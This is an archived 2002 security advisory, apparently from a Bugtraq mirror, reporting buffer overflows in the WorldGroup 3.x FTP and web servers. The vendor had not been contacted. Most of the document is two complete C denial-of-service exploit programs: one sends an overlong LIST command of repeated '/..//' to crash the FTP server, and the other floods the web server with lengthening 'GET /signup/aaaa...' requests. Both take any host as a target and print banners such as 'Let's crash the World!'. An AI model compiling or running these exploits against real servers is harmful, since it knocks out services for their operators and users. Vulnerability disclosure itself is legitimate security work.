SECURITY.NNOV: Buffer overflows in Worldgroup

2002-02-27T00:00:00
ID SECURITYVULNS:DOC:2553
Type securityvulns
Reporter Securityvulns
Modified 2002-02-27T00:00:00

Description

Dear bugtraq,

Topic: buffer overflows in WorldGroup 3.0 ftp and web servers Authors: Limpid Byte team (http://lbyte.void.ru, lbyte@host.sk) Date: February, 25 2002 Software: WorldGroup 3.x Vendor: Galacticomm (http://www.gcomm.com/) Risk: High Remote: Yes Exploitable: Yes Vendor Status: Not contacted, not confirmed

Details:

Limpid Byte team (http://lbyte.void.ru, lbyte@host.sk) reports buffer overflows in WorldGroup 3.x ftp and web servers by Galacticomm (http://www.gcomm.com/).

For FTP server overflow on long LIST command. For HTTP overflow on long request GET /signup/a.[aaaaaaaa....aaaa] HTTP/1.0

Vendor:

Vendor was not contacted because contact information is not available on the Web site (support only available for registered users).

Exploit:

DoS exploits by Limpid Byte team (also available from http://www.security.nnov.ru/files/worldgroupdos.zip)

----------------- BEGIN FTP_DOS.C --------------------- /* by Limpid Byte project http://lbyte.void.ru lbyte@host.sk

[Worldgroup FTP Server Denial of Service] More than 105 "/" in LIST command.

*/

include <stdio.h>

include <stdlib.h>

include <string.h>

include <winsock.h>

define FOUND "220"

int main(int argc, char argv[]) { int sock; struct sockaddr_in blah; struct hostent he; char cgiBuff[1024]; char *cgiPage[6]; WSADATA wsaData; char cr[] = "\n";

    if &#40;argc &lt; 3&#41;
    {

printf("\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nThis program crash Worldgroup servers 3.xx for windows 95/98/ME/NT/2K."); printf("\n\rGreets to [WhU]//[GiN]//[LByte]//[WGHACK] projects!\n\r USAGE:\n\r"); printf("Ftp_dos.exe [HOST] [LOGIN] [PASSWORD] "); printf("\n\r example : fpt_dos.exe 127.0.0.1 anonymous anonymous@127.0.0.1 \n"); exit(1); } cgiPage[0] = "USER "; cgiPage[1] = (argv[2]); cgiPage[2] = "PASS "; cgiPage[3] = (argv[3]); cgiPage[4] = "PASV"; cgiPage[5] = "LIST /..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//../\n";

    if&#40;WSAStartup&#40;0x101,&amp;wsaData&#41;&#41;
    {
            printf&#40;&quot;Unable to initialize WinSock lib.&#92;n&quot;&#41;;
            exit&#40;1&#41;;
    }

printf("Let's crash the World!\n\r"); printf("Coded by the [eaSt]:\n\r"); printf("\nConnecting %s on port 21...\n\n", argv[1]);

    sock = socket&#40;AF_INET,SOCK_STREAM,0&#41;;
    blah.sin_family=AF_INET;
    blah.sin_addr.s_addr=inet_addr&#40;argv[1]&#41;;
    blah.sin_port=htons&#40;21&#41;;
    if &#40;&#40;he = gethostbyname&#40;argv[1]&#41;&#41; != NULL&#41;
    {
            memcpy&#40;&#40;char *&#41;&amp;blah.sin_addr, he-&gt;h_addr, he-&gt;h_length&#41;;
    }
    else
    {
            if &#40;&#40;blah.sin_addr.s_addr = inet_addr&#40;argv[1]&#41;&#41;==INADDR_NONE&#41;
            {
            WSACleanup&#40;&#41;;
            exit&#40;1&#41;;
            }
    }

    if &#40;connect&#40;sock,&#40;struct sockaddr*&#41;&amp;blah,sizeof&#40;blah&#41;&#41;!=0&#41;
    {
            WSACleanup&#40;&#41;;
            exit&#40;1&#41;;
    }
    memset&#40;cgiBuff, 0, sizeof&#40;cgiBuff&#41;&#41;;
    cgiBuff[recv&#40;sock,cgiBuff,sizeof&#40;cgiBuff&#41; - 1 ,0&#41;] = 0;
    printf&#40;&quot;&lt;&lt; &#37;s&quot;, cgiBuff&#41;;
    send&#40;sock,cgiPage[0],strlen&#40;cgiPage[0]&#41;,0&#41;;
    send&#40;sock,cgiPage[1],strlen&#40;cgiPage[1]&#41;,0&#41;;
    send&#40;sock,cr,1,0&#41;;
    memset&#40;cgiBuff, 0, sizeof&#40;cgiBuff&#41;&#41;;
    cgiBuff[recv&#40;sock,cgiBuff,sizeof&#40;cgiBuff&#41; - 1 ,0&#41;] = 0;
    printf&#40;&quot;&gt;&gt; &#37;s &#37;s&#92;n&lt;&lt; &#37;s&quot;, cgiPage[0], cgiPage[1], cgiBuff&#41;;
    send&#40;sock,cgiPage[2],strlen&#40;cgiPage[2]&#41;,0&#41;;
    send&#40;sock,cgiPage[3],strlen&#40;cgiPage[3]&#41;,0&#41;;
    send&#40;sock,cr,1,0&#41;;
    memset&#40;cgiBuff, 0, sizeof&#40;cgiBuff&#41;&#41;;
    cgiBuff[recv&#40;sock,cgiBuff,sizeof&#40;cgiBuff&#41; - 1 ,0&#41;] = 0;
    printf&#40;&quot;&gt;&gt; &#37;s &#37;s&#92;n&lt;&lt; &#37;s&quot;, cgiPage[2], cgiPage[3], cgiBuff&#41;;
    send&#40;sock,cgiPage[4],strlen&#40;cgiPage[4]&#41;,0&#41;;
    send&#40;sock,cr,1,0&#41;;
    memset&#40;cgiBuff, 0, sizeof&#40;cgiBuff&#41;&#41;;
    cgiBuff[recv&#40;sock,cgiBuff,sizeof&#40;cgiBuff&#41; - 1 ,0&#41;] = 0;
    printf&#40;&quot;&gt;&gt; &#37;s&#92;n&lt;&lt; &#37;s&quot;, cgiPage[4], cgiBuff&#41;;
    send&#40;sock,cgiPage[5],strlen&#40;cgiPage[5]&#41;,0&#41;;
    send&#40;sock,cr,1,0&#41;;
    memset&#40;cgiBuff, 0, sizeof&#40;cgiBuff&#41;&#41;;
    cgiBuff[recv&#40;sock,cgiBuff,sizeof&#40;cgiBuff&#41; - 1 ,0&#41;] = 0;
    printf&#40;&quot;&gt;&gt; &#37;s&#92;n&lt;&lt; &#37;s&quot;, cgiPage[5], cgiBuff&#41;;

    printf&#40;&quot;Try reconnect to &#37;s&#92;n&quot;, argv[1]&#41;;
    WSACleanup&#40;&#41;;
    return 0;

} ----------------- END FTP_DOS.C ---------------------

----------------- BEGIN WWW_DOS.C --------------------- /* by Limpid Byte project http://lbyte.void.ru lbyte@host.sk

Worldgroup Server Denial of Service for Windows 9x/ME only. Error between system fuction windows and worldgroup from web interface. REGUEST: GET /signup/a.[aaaaaaaa....aaaa]

*/

include <stdio.h>

include <stdlib.h>

include <string.h>

include <winsock.h>

define FOUND "200"

int main(int argc, char argv[]) { int sock, count; struct sockaddr_in blah; struct hostent he; char cgiBuff[1024]; WSADATA wsaData;

    if &#40;argc &lt; 2&#41;
    {
            printf&#40;&quot;&#92;n&#92;n&#92;n&#92;n&#92;n&#92;n&#92;n&#92;n&#92;n&#92;n&#92;n&#92;n&#92;n&#92;n&#92;n&#92;n&#92;n&#92;nThis program crash Worldgroup servers 3.20 for windows 95/98/ME.&#92;n&quot;&#41;;
            printf&#40;&quot;Greets to [WhU]//[GiN]//[LByte]//[WGHACK] projects!&#92;n&#92;n&quot;&#41;;
            printf&#40;&quot; USAGE   : www_dos.exe [HOST] &#92;n&quot;&#41;;
            printf&#40;&quot; example : www_dos.exe 127.0.0.1 &#92;n&quot;&#41;;
            exit&#40;1&#41;;
    }

    if&#40;WSAStartup&#40;0x101,&amp;wsaData&#41;&#41;  
    {
            printf&#40;&quot;Unable to initialize WinSock lib.&#92;n&quot;&#41;; 
            exit&#40;1&#41;;   
    }
    printf&#40;&quot;Let&#39;s crash the World!&#92;n&quot;&#41;;
    printf&#40;&quot;Coded by the [eaSt]:&#92;n&quot;&#41;;
    printf&#40;&quot;&#92;nScanning &#37;s on port 80...&#92;n&#92;n&quot;, argv[1]&#41;;

    for &#40;count = 0; count &lt; 94; count++&#41;
    {
            sock = socket&#40;AF_INET,SOCK_STREAM,0&#41;;
            blah.sin_family=AF_INET;
            blah.sin_addr.s_addr=inet_addr&#40;argv[1]&#41;;
            blah.sin_port=htons&#40;80&#41;;
            if &#40;&#40;he = gethostbyname&#40;argv[1]&#41;&#41; != NULL&#41;
            {
                    memcpy&#40;&#40;char *&#41;&amp;blah.sin_addr, he-&gt;h_addr, he-&gt;h_length&#41;;
            }
            else
            {
                    if &#40;&#40;blah.sin_addr.s_addr = inet_addr&#40;argv[1]&#41;&#41;==INADDR_NONE&#41;
                {
                            WSACleanup&#40;&#41;;
                            exit&#40;1&#41;;
                    }
            }

            if &#40;connect&#40;sock,&#40;struct sockaddr*&#41;&amp;blah,sizeof&#40;blah&#41;&#41;!=0&#41;
            {
                    WSACleanup&#40;&#41;;
                    exit&#40;1&#41;;
            }

            memset&#40;cgiBuff, 0, sizeof&#40;cgiBuff&#41;&#41;;
            sprintf&#40;cgiBuff, &quot;GET /signup/&quot;&#41;;
            memset&#40;cgiBuff + 12, &#39;a&#39;, 219 + count&#41;;
            sprintf&#40;cgiBuff + 12 + 219 + count, &quot;.txt?=../test.txt HTTP/1.0&#92;n&#92;n&quot;&#41;;
            printf&#40;&quot;Sending: &#37;d symbols request&#92;n&quot;, strlen&#40;cgiBuff&#41;&#41;;

            send&#40;sock,cgiBuff,strlen&#40;cgiBuff&#41;,0&#41;;
            memset&#40;cgiBuff, 0, sizeof&#40;cgiBuff&#41;&#41;;
            if&#40;!recv&#40;sock,cgiBuff,sizeof&#40;cgiBuff&#41;,0&#41;&#41; {
                    printf&#40;&quot;Crashed&#92;n&quot;&#41;;
            }
            else {
                    cgiBuff[32] = 0;
                    if &#40;strstr&#40;cgiBuff,FOUND&#41;&#41;
                    {
                            printf&#40;&quot;Send &#40;&#37;s&#41;&#92;n&quot;, cgiBuff&#41;;
                    }
                    else
                    {
                            printf&#40;&quot;Not Found &#40;&#37;s&#41;&#92;n&quot;, cgiBuff&#41;;
                    }
            }

            closesocket&#40;sock&#41;;
    }

    printf&#40;&quot;Try reconnect to &#37;s&#92;n&quot;, argv[1]&#41;;
    WSACleanup&#40;&#41;;
    return 0;

} ----------------- END WWW_DOS.C ---------------------

-- http://www.security.nnov.ru /\_/\ { , . } |\ +--oQQo->{ ^ }<-----+ \ | ZARAZA U 3APA3A } +-------------o66o--+ / |/ You know my name - look up my number (The Beatles)